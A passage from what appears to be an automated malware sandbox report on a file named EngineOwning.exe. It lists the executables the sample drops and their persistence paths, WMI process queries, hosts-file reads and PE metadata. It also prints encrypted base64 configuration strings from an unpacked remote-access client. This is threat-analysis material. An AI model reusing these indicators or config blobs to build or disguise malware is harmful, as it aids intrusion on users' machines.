      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kov1ngs.cpb.ps1Jump to behavior
      Source: C:\ProgramData\winrsdhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\ProgramData\mdsigstub.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: Client[1].exe.0.dr, Client/Settings.csBase64 encoded string: 'rCkmbUFw2s6P5dcuG8uyF/XpayTnZPD24p9otxRJQ3rG/uGGenpRsXmOTcJy1cDgmzJuIJnHPDzC0DjG7Pe9yg==', 'PGL8Lj+sAwEu2jWggjAoyuMfR8rJvsl4p9AQKAaOjfjNxQy5gHE58X0Dd94tpL/PwgTSCfOINQ2idW8RkqPQ/w==', 'OqF2e7w3pvfO9u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==', 'ScWinUk4BoNS77UGOrj9AZ8u7nFaoxNA9nZP1JT+MGmUVC0oJr4mIStZ7VpgAx46QCzb7FMa+pvI/AtrIBGwANzwxK6w+R0JZ6I5v9Au+QvNgOMHZM0bKT4vzuDYKsJYGDuaHDHlwtX8iFM4bed0ZDUwIzMBlKPNxrAnkOXtnacKsiS7yS/gGqASG5ARnH+DcBkRJp6jMstl4PxSkH9RhaYAMhorz28eDqI0Fh21Jb9co+26SjCykQ7+vJHgbJKHxzOmq8VYfpTjWK2WMy1fOjVs9cMkj4bixwbhUewpmY0ajmpze2WrsDx/it+jHz1j3zEQoiMrmTiT1KTedP1t8HPkU/M3OAVWb4UaPEr++ZIGjr94UCj9jm/Le5FwWzUAyOnl92+ciETrj8+MXCRGl/eAFTwsESrVDJMcNKRSLSu3QNm0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk3OXlvTfgyoeHRm901aQQLalWPmIhVQDAnj3lKTECIn/inoZ/xojUY3p+N2r2+s1uaPsXwDWlfZhzhs3+ttgTlfsKTpo974vzUaaMftJ1gaIOKsqIj/LdH4WIwvE/U0NeRRpKhfNdTzN/uzYBFef2BwUfmZXmKN1bfd8V4mXj7jtIQNrkeoMAFX2IXx2oADKIFyYsEZ+sBBdR8gEMpLRqh+yCpbNGL1YPUMc7gr03ko/LHHpyYOS2f8V4k7IKxdJ6EYko0Pkg+JXo0kkCeH/0OuJfokgalcGPjn2mBMSj6qTeGLneP3CptXB5OWBN/OaYPJfmgaEEUxq1lY9S4Fd5u6Bqlr2eygUhiuqCeAB39i44yF9Fl6S3uf/VQ/ZmSaaBPup+3SpMP0Q5qO+MitfjCUPZ50nuqTvknwJ1bvNAzb6nKPah/PrgBFmVN/vrlE8nLOgS8GVsja9HwS5YgNA/i9hnkNdq55spSLVvlkDS6AwtmNeHS6++610fgFqWQoP5mP681kUTLzZtAJcqyIUQSVCir9AM0x2WcSFUp4anA==', 'pgjzWQgeyVC0syy4V6rOosKG3XbWUcYbFQx6P/kjJCg2ZSqsMCeJJpin2U7+K7N9k1DTn/fzDbrvOMrTSyr4WFBMcH+YVItW8eUpN74BfLPj1YP3Q7KP0XPdiV6dxRhb', 'RjYKZDVUvcEPC85GPNDmKHXUsYx6D7aCSGYtqO9qKSHgZ+WkIVom3rqAB0AFlH/J92r+7SGIPilBXsZXVTrFbQ==', 'zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ=='
      Source: mdsigstub.exe.0.dr, Client/Settings.csBase64 encoded string: 'rCkmbUFw2s6P5dcuG8uyF/XpayTnZPD24p9otxRJQ3rG/uGGenpRsXmOTcJy1cDgmzJuIJnHPDzC0DjG7Pe9yg==', 'PGL8Lj+sAwEu2jWggjAoyuMfR8rJvsl4p9AQKAaOjfjNxQy5gHE58X0Dd94tpL/PwgTSCfOINQ2idW8RkqPQ/w==', 'OqF2e7w3pvfO9u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==', 'ScWinUk4BoNS77UGOrj9AZ8u7nFaoxNA9nZP1JT+MGmUVC0oJr4mIStZ7VpgAx46QCzb7FMa+pvI/AtrIBGwANzwxK6w+R0JZ6I5v9Au+QvNgOMHZM0bKT4vzuDYKsJYGDuaHDHlwtX8iFM4bed0ZDUwIzMBlKPNxrAnkOXtnacKsiS7yS/gGqASG5ARnH+DcBkRJp6jMstl4PxSkH9RhaYAMhorz28eDqI0Fh21Jb9co+26SjCykQ7+vJHgbJKHxzOmq8VYfpTjWK2WMy1fOjVs9cMkj4bixwbhUewpmY0ajmpze2WrsDx/it+jHz1j3zEQoiMrmTiT1KTedP1t8HPkU/M3OAVWb4UaPEr++ZIGjr94UCj9jm/Le5FwWzUAyOnl92+ciETrj8+MXCRGl/eAFTwsESrVDJMcNKRSLSu3QNm0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk3OXlvTfgyoeHRm901aQQLalWPmIhVQDAnj3lKTECIn/inoZ/xojUY3p+N2r2+s1uaPsXwDWlfZhzhs3+ttgTlfsKTpo974vzUaaMftJ1gaIOKsqIj/LdH4WIwvE/U0NeRRpKhfNdTzN/uzYBFef2BwUfmZXmKN1bfd8V4mXj7jtIQNrkeoMAFX2IXx2oADKIFyYsEZ+sBBdR8gEMpLRqh+yCpbNGL1YPUMc7gr03ko/LHHpyYOS2f8V4k7IKxdJ6EYko0Pkg+JXo0kkCeH/0OuJfokgalcGPjn2mBMSj6qTeGLneP3CptXB5OWBN/OaYPJfmgaEEUxq1lY9S4Fd5u6Bqlr2eygUhiuqCeAB39i44yF9Fl6S3uf/VQ/ZmSaaBPup+3SpMP0Q5qO+MitfjCUPZ50nuqTvknwJ1bvNAzb6nKPah/PrgBFmVN/vrlE8nLOgS8GVsja9HwS5YgNA/i9hnkNdq55spSLVvlkDS6AwtmNeHS6++610fgFqWQoP5mP681kUTLzZtAJcqyIUQSVCir9AM0x2WcSFUp4anA==', 'pgjzWQgeyVC0syy4V6rOosKG3XbWUcYbFQx6P/kjJCg2ZSqsMCeJJpin2U7+K7N9k1DTn/fzDbrvOMrTSyr4WFBMcH+YVItW8eUpN74BfLPj1YP3Q7KP0XPdiV6dxRhb', 'RjYKZDVUvcEPC85GPNDmKHXUsYx6D7aCSGYtqO9qKSHgZ+WkIVom3rqAB0AFlH/J92r+7SGIPilBXsZXVTrFbQ==', 'zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ=='
      Source: 7.2.mdsigstub.exe.2f0000.0.unpack, Client/Settings.csBase64 encoded string: 'rCkmbUFw2s6P5dcuG8uyF/XpayTnZPD24p9otxRJQ3rG/uGGenpRsXmOTcJy1cDgmzJuIJnHPDzC0DjG7Pe9yg==', 'PGL8Lj+sAwEu2jWggjAoyuMfR8rJvsl4p9AQKAaOjfjNxQy5gHE58X0Dd94tpL/PwgTSCfOINQ2idW8RkqPQ/w==', 'OqF2e7w3pvfO9u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==', 'ScWinUk4BoNS77UGOrj9AZ8u7nFaoxNA9nZP1JT+MGmUVC0oJr4mIStZ7VpgAx46QCzb7FMa+pvI/AtrIBGwANzwxK6w+R0JZ6I5v9Au+QvNgOMHZM0bKT4vzuDYKsJYGDuaHDHlwtX8iFM4bed0ZDUwIzMBlKPNxrAnkOXtnacKsiS7yS/gGqASG5ARnH+DcBkRJp6jMstl4PxSkH9RhaYAMhorz28eDqI0Fh21Jb9co+26SjCykQ7+vJHgbJKHxzOmq8VYfpTjWK2WMy1fOjVs9cMkj4bixwbhUewpmY0ajmpze2WrsDx/it+jHz1j3zEQoiMrmTiT1KTedP1t8HPkU/M3OAVWb4UaPEr++ZIGjr94UCj9jm/Le5FwWzUAyOnl92+ciETrj8+MXCRGl/eAFTwsESrVDJMcNKRSLSu3QNm0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk3OXlvTfgyoeHRm901aQQLalWPmIhVQDAnj3lKTECIn/inoZ/xojUY3p+N2r2+s1uaPsXwDWlfZhzhs3+ttgTlfsKTpo974vzUaaMftJ1gaIOKsqIj/LdH4WIwvE/U0NeRRpKhfNdTzN/uzYBFef2BwUfmZXmKN1bfd8V4mXj7jtIQNrkeoMAFX2IXx2oADKIFyYsEZ+sBBdR8gEMpLRqh+yCpbNGL1YPUMc7gr03ko/LHHpyYOS2f8V4k7IKxdJ6EYko0Pkg+JXo0kkCeH/0OuJfokgalcGPjn2mBMSj6qTeGLneP3CptXB5OWBN/OaYPJfmgaEEUxq1lY9S4Fd5u6Bqlr2eygUhiuqCeAB39i44yF9Fl6S3uf/VQ/ZmSaaBPup+3SpMP0Q5qO+MitfjCUPZ50nuqTvknwJ1bvNAzb6nKPah/PrgBFmVN/vrlE8nLOgS8GVsja9HwS5YgNA/i9hnkNdq55spSLVvlkDS6AwtmNeHS6++610fgFqWQoP5mP681kUTLzZtAJcqyIUQSVCir9AM0x2WcSFUp4anA==', 'pgjzWQgeyVC0syy4V6rOosKG3XbWUcYbFQx6P/kjJCg2ZSqsMCeJJpin2U7+K7N9k1DTn/fzDbrvOMrTSyr4WFBMcH+YVItW8eUpN74BfLPj1YP3Q7KP0XPdiV6dxRhb', 'RjYKZDVUvcEPC85GPNDmKHXUsYx6D7aCSGYtqO9qKSHgZ+WkIVom3rqAB0AFlH/J92r+7SGIPilBXsZXVTrFbQ==', 'zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ=='
      Source: 7.0.mdsigstub.exe.2f0000.0.unpack, Client/Settings.csBase64 encoded string: 'rCkmbUFw2s6P5dcuG8uyF/XpayTnZPD24p9otxRJQ3rG/uGGenpRsXmOTcJy1cDgmzJuIJnHPDzC0DjG7Pe9yg==', 'PGL8Lj+sAwEu2jWggjAoyuMfR8rJvsl4p9AQKAaOjfjNxQy5gHE58X0Dd94tpL/PwgTSCfOINQ2idW8RkqPQ/w==', 'OqF2e7w3pvfO9u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==', 'ScWinUk4BoNS77UGOrj9AZ8u7nFaoxNA9nZP1JT+MGmUVC0oJr4mIStZ7VpgAx46QCzb7FMa+pvI/AtrIBGwANzwxK6w+R0JZ6I5v9Au+QvNgOMHZM0bKT4vzuDYKsJYGDuaHDHlwtX8iFM4bed0ZDUwIzMBlKPNxrAnkOXtnacKsiS7yS/gGqASG5ARnH+DcBkRJp6jMstl4PxSkH9RhaYAMhorz28eDqI0Fh21Jb9co+26SjCykQ7+vJHgbJKHxzOmq8VYfpTjWK2WMy1fOjVs9cMkj4bixwbhUewpmY0ajmpze2WrsDx/it+jHz1j3zEQoiMrmTiT1KTedP1t8HPkU/M3OAVWb4UaPEr++ZIGjr94UCj9jm/Le5FwWzUAyOnl92+ciETrj8+MXCRGl/eAFTwsESrVDJMcNKRSLSu3QNm0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk3OXlvTfgyoeHRm901aQQLalWPmIhVQDAnj3lKTECIn/inoZ/xojUY3p+N2r2+s1uaPsXwDWlfZhzhs3+ttgTlfsKTpo974vzUaaMftJ1gaIOKsqIj/LdH4WIwvE/U0NeRRpKhfNdTzN/uzYBFef2BwUfmZXmKN1bfd8V4mXj7jtIQNrkeoMAFX2IXx2oADKIFyYsEZ+sBBdR8gEMpLRqh+yCpbNGL1YPUMc7gr03ko/LHHpyYOS2f8V4k7IKxdJ6EYko0Pkg+JXo0kkCeH/0OuJfokgalcGPjn2mBMSj6qTeGLneP3CptXB5OWBN/OaYPJfmgaEEUxq1lY9S4Fd5u6Bqlr2eygUhiuqCeAB39i44yF9Fl6S3uf/VQ/ZmSaaBPup+3SpMP0Q5qO+MitfjCUPZ50nuqTvknwJ1bvNAzb6nKPah/PrgBFmVN/vrlE8nLOgS8GVsja9HwS5YgNA/i9hnkNdq55spSLVvlkDS6AwtmNeHS6++610fgFqWQoP5mP681kUTLzZtAJcqyIUQSVCir9AM0x2WcSFUp4anA==', 'pgjzWQgeyVC0syy4V6rOosKG3XbWUcYbFQx6P/kjJCg2ZSqsMCeJJpin2U7+K7N9k1DTn/fzDbrvOMrTSyr4WFBMcH+YVItW8eUpN74BfLPj1YP3Q7KP0XPdiV6dxRhb', 'RjYKZDVUvcEPC85GPNDmKHXUsYx6D7aCSGYtqO9qKSHgZ+WkIVom3rqAB0AFlH/J92r+7SGIPilBXsZXVTrFbQ==', 'zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ=='
      Source: 7.0.mdsigstub.exe.2f0000.2.unpack, Client/Settings.csBase64 encoded string: 'rCkmbUFw2s6P5dcuG8uyF/XpayTnZPD24p9otxRJQ3rG/uGGenpRsXmOTcJy1cDgmzJuIJnHPDzC0DjG7Pe9yg==', 'PGL8Lj+sAwEu2jWggjAoyuMfR8rJvsl4p9AQKAaOjfjNxQy5gHE58X0Dd94tpL/PwgTSCfOINQ2idW8RkqPQ/w==', 'OqF2e7w3pvfO9u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==', 'ScWinUk4BoNS77UGOrj9AZ8u7nFaoxNA9nZP1JT+MGmUVC0oJr4mIStZ7VpgAx46QCzb7FMa+pvI/AtrIBGwANzwxK6w+R0JZ6I5v9Au+QvNgOMHZM0bKT4vzuDYKsJYGDuaHDHlwtX8iFM4bed0ZDUwIzMBlKPNxrAnkOXtnacKsiS7yS/gGqASG5ARnH+DcBkRJp6jMstl4PxSkH9RhaYAMhorz28eDqI0Fh21Jb9co+26SjCykQ7+vJHgbJKHxzOmq8VYfpTjWK2WMy1fOjVs9cMkj4bixwbhUewpmY0ajmpze2WrsDx/it+jHz1j3zEQoiMrmTiT1KTedP1t8HPkU/M3OAVWb4UaPEr++ZIGjr94UCj9jm/Le5FwWzUAyOnl92+ciETrj8+MXCRGl/eAFTwsESrVDJMcNKRSLSu3QNm0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk3OXlvTfgyoeHRm901aQQLalWPmIhVQDAnj3lKTECIn/inoZ/xojUY3p+N2r2+s1uaPsXwDWlfZhzhs3+ttgTlfsKTpo974vzUaaMftJ1gaIOKsqIj/LdH4WIwvE/U0NeRRpKhfNdTzN/uzYBFef2BwUfmZXmKN1bfd8V4mXj7jtIQNrkeoMAFX2IXx2oADKIFyYsEZ+sBBdR8gEMpLRqh+yCpbNGL1YPUMc7gr03ko/LHHpyYOS2f8V4k7IKxdJ6EYko0Pkg+JXo0kkCeH/0OuJfokgalcGPjn2mBMSj6qTeGLneP3CptXB5OWBN/OaYPJfmgaEEUxq1lY9S4Fd5u6Bqlr2eygUhiuqCeAB39i44yF9Fl6S3uf/VQ/ZmSaaBPup+3SpMP0Q5qO+MitfjCUPZ50nuqTvknwJ1bvNAzb6nKPah/PrgBFmVN/vrlE8nLOgS8GVsja9HwS5YgNA/i9hnkNdq55spSLVvlkDS6AwtmNeHS6++610fgFqWQoP5mP681kUTLzZtAJcqyIUQSVCir9AM0x2WcSFUp4anA==', 'pgjzWQgeyVC0syy4V6rOosKG3XbWUcYbFQx6P/kjJCg2ZSqsMCeJJpin2U7+K7N9k1DTn/fzDbrvOMrTSyr4WFBMcH+YVItW8eUpN74BfLPj1YP3Q7KP0XPdiV6dxRhb', 'RjYKZDVUvcEPC85GPNDmKHXUsYx6D7aCSGYtqO9qKSHgZ+WkIVom3rqAB0AFlH/J92r+7SGIPilBXsZXVTrFbQ==', 'zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ=='
      Source: 7.0.mdsigstub.exe.2f0000.1.unpack, Client/Settings.csBase64 encoded string: 'rCkmbUFw2s6P5dcuG8uyF/XpayTnZPD24p9otxRJQ3rG/uGGenpRsXmOTcJy1cDgmzJuIJnHPDzC0DjG7Pe9yg==', 'PGL8Lj+sAwEu2jWggjAoyuMfR8rJvsl4p9AQKAaOjfjNxQy5gHE58X0Dd94tpL/PwgTSCfOINQ2idW8RkqPQ/w==', 'OqF2e7w3pvfO9u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==', 'ScWinUk4BoNS77UGOrj9AZ8u7nFaoxNA9nZP1JT+MGmUVC0oJr4mIStZ7VpgAx46QCzb7FMa+pvI/AtrIBGwANzwxK6w+R0JZ6I5v9Au+QvNgOMHZM0bKT4vzuDYKsJYGDuaHDHlwtX8iFM4bed0ZDUwIzMBlKPNxrAnkOXtnacKsiS7yS/gGqASG5ARnH+DcBkRJp6jMstl4PxSkH9RhaYAMhorz28eDqI0Fh21Jb9co+26SjCykQ7+vJHgbJKHxzOmq8VYfpTjWK2WMy1fOjVs9cMkj4bixwbhUewpmY0ajmpze2WrsDx/it+jHz1j3zEQoiMrmTiT1KTedP1t8HPkU/M3OAVWb4UaPEr++ZIGjr94UCj9jm/Le5FwWzUAyOnl92+ciETrj8+MXCRGl/eAFTwsESrVDJMcNKRSLSu3QNm0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk3OXlvTfgyoeHRm901aQQLalWPmIhVQDAnj3lKTECIn/inoZ/xojUY3p+N2r2+s1uaPsXwDWlfZhzhs3+ttgTlfsKTpo974vzUaaMftJ1gaIOKsqIj/LdH4WIwvE/U0NeRRpKhfNdTzN/uzYBFef2BwUfmZXmKN1bfd8V4mXj7jtIQNrkeoMAFX2IXx2oADKIFyYsEZ+sBBdR8gEMpLRqh+yCpbNGL1YPUMc7gr03ko/LHHpyYOS2f8V4k7IKxdJ6EYko0Pkg+JXo0kkCeH/0OuJfokgalcGPjn2mBMSj6qTeGLneP3CptXB5OWBN/OaYPJfmgaEEUxq1lY9S4Fd5u6Bqlr2eygUhiuqCeAB39i44yF9Fl6S3uf/VQ/ZmSaaBPup+3SpMP0Q5qO+MitfjCUPZ50nuqTvknwJ1bvNAzb6nKPah/PrgBFmVN/vrlE8nLOgS8GVsja9HwS5YgNA/i9hnkNdq55spSLVvlkDS6AwtmNeHS6++610fgFqWQoP5mP681kUTLzZtAJcqyIUQSVCir9AM0x2WcSFUp4anA==', 'pgjzWQgeyVC0syy4V6rOosKG3XbWUcYbFQx6P/kjJCg2ZSqsMCeJJpin2U7+K7N9k1DTn/fzDbrvOMrTSyr4WFBMcH+YVItW8eUpN74BfLPj1YP3Q7KP0XPdiV6dxRhb', 'RjYKZDVUvcEPC85GPNDmKHXUsYx6D7aCSGYtqO9qKSHgZ+WkIVom3rqAB0AFlH/J92r+7SGIPilBXsZXVTrFbQ==', 'zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ=='
      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7076
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6436
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\EngineOwning.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\ProgramData\mdsigstub.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: EngineOwning.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: EngineOwning.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
      Source: EngineOwning.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\User\Desktop\visual studio crypting\main (c++)_2\x64\Release\vexternal.pdb source: EngineOwning.exe, 00000000.00000000.493154695.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp, EngineOwning.exe, 00000000.00000000.429374377.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\User\Desktop\visual studio crypting\main (c++)_2\x64\Release\vexternal.pdbDC source: EngineOwning.exe, 00000000.00000000.493154695.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp, EngineOwning.exe, 00000000.00000000.429374377.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp
      Source: EngineOwning.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: EngineOwning.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: EngineOwning.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: EngineOwning.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: EngineOwning.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
